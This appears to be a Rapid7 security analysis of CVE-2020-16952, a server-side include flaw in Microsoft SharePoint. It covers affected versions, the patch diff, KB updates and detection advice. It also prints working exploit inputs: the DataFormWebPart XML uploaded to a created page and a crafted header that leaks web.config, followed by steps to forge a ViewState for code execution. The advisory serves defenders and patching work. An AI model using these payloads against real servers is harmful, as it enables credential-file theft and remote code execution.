Update October 14, 2020: A Metasploit module exploiting CVE-2020-16952 has been published and contains remote check logic as well as supplementary exploitation details.
Description
On Tuesday, October 13, as part of the October 2020 Patch Tuesday release, Microsoft published a security advisory for CVE-2020-16952, a server-side include (SSI) vulnerability in Microsoft SharePoint. The bug is exploitable by an authenticated user with page creation privileges, which is a standard permission in SharePoint, and allows the leaking of an arbitrary file, notably the application’s web.config file, which can be used to trigger remote code execution (RCE) via .NET deserialization. CVE-2020-16952 carries a CVSSv3 base score of 8.6.
Steven Seeley, the researcher who discovered and disclosed the vulnerability to Microsoft, published an advisory of his own with the vulnerability’s technical details. Seeley’s advisory includes a proof-of-concept (PoC) Python exploit that leverages the vulnerability to leak the web.config file, extract the ViewState validation key, and forge a malicious ViewState that will be deserialized by the application. Using a .NET gadget chain from ysoserial.net, the exploit is able to execute an arbitrary command as the SharePoint user.
An easily available proof-of-concept makes CVE-2020-16952 an impending threat. There are no reports of exploitation in the wild as of October 13, 2020.
Affected products
- Microsoft SharePoint Foundation 2013 Service Pack 1
- Microsoft SharePoint Enterprise Server 2016
- Microsoft SharePoint Server 2019
Rapid7 analysis
CVE-2020-16952 exists within the CreateChildControls() method in the Microsoft.SharePoint.WebPartPages.DataFormWebPart class and is well-documented in Seeley’s exploit.
Exploitation of the vulnerability is straightforward and begins with NTLM authentication over HTTP. After authentication has succeeded, an HTTP PUT request containing the following XML is sent to /poc.aspx (or any page the attacker is able to create). This is used to establish the source of the server-side include (SSI), which is the HTTP header 360Vulcan (or a header of the attacker’s choosing).
<WebPartPages:DataFormWebPart runat="server">
<ParameterBindings>
<ParameterBinding Name="ssi" Location="ServerVariable(HTTP_360Vulcan)" DefaultValue="" />
</ParameterBindings>
<xsl>
<xsl:stylesheet xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:param name="ssi" />
<xsl:template match="/">
<xsl:value-of select="$ssi" disable-output-escaping="yes" />
</xsl:template>
</xsl:stylesheet>
</xsl>
</WebPartPages:DataFormWebPart>
Next, a GET request containing the 360Vulcan header is sent to /poc.aspx in order to trigger the SSI and leak SharePoint’s web.config file. The header can be seen below.
360Vulcan: <form runat="server" /><!--#include virtual="/web.config"-->
Finally, using the ViewState validation key extracted from web.config, the attacker is able to forge their own ViewState containing ysoserial.net gadgets and execute a command of their choosing.
The patch for CVE-2020-16952 enables blockServerSideIncludes in the VerifyControlOnSafeList() call within CreateChildControls():
- EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, false);
+ EditingPageParser.VerifyControlOnSafeList(this._dataSourcesString.Trim(), null, base.Web, true);internal static void VerifyControlOnSafeList(string dscXml, RegisterDirectiveManager registerDirectiveManager, SPWeb web, bool blockServerSideIncludes = false)SharePoint is a high-value attack target and has seen a number of high-severity vulnerabilities patched in recent months. It is likely that active exploitation will occur within a relatively short time frame; it was trivial for Rapid7 researchers to validate the vulnerability’s exploitability and weaponize Seeley’s PoC.
Guidance
Since an exploit has been released, Rapid7 researchers recommend applying Microsoft’s patch immediately. CVE-2020-16952 poses higher risk for multi-tenant environments—i.e., multiple organizations using the same SharePoint and/or Active Directory environment.
For patching information, please see KB4486694 for SharePoint 2013, KB4486677 for SharePoint 2016, and KB4486676 for SharePoint 2019.
Defenders can detect this exploit variant by identifying HTTP headers containing the string runat="server", as well as auditing SharePoint page creations.
References
- https://srcincite.io/advisories/src-2020-0022/
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://portal.msrc.microsoft.com/en-us/security-guidance/releasenotedetail/2020-Oct
